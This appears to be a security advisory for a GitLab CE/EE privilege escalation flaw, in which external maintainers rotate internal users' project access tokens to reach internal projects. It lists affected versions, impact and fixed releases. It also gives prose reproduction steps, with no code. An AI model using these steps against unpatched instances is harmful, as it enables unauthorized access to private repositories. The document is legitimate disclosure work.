GitLab CE/EE Privilege Escalation Vulnerability via Project Access Token Rotation

A vulnerability exists in GitLab CE/EE versions 16.0 prior to 17.8.6, 17.9 prior to 17.9.3, and 17.10 prior to 17.10.1. This issue allows internal users to gain unauthorized access to internal projects by exploiting project access tokens. External users with maintainer privileges can rotate project tokens created by internal users, thereby accessing internal projects and sensitive data. This vulnerability also enables the creation of new internal projects and interaction with them, such as posting issues.

Impact

Exploitation of this vulnerability allows external users to access and clone internal repositories, potentially leading to the leakage of sensitive data. Additionally, with the appropriate access token scopes, users can create and manage internal projects.

Reproduction

To reproduce this vulnerability, an internal user must create a private project and invite an external user as a maintainer. The internal user then generates a project access token with API scopes. The external user can rotate this token, which then allows access to internal projects via the GitLab API. This can be verified by attempting to access an internal project using the rotated token, which should succeed, while direct access through the GitLab interface would result in a '404 Not Found' error.

Remediation

This vulnerability has been addressed in GitLab. Users should update to GitLab versions 17.8.6, 17.9.3, or 17.10.1.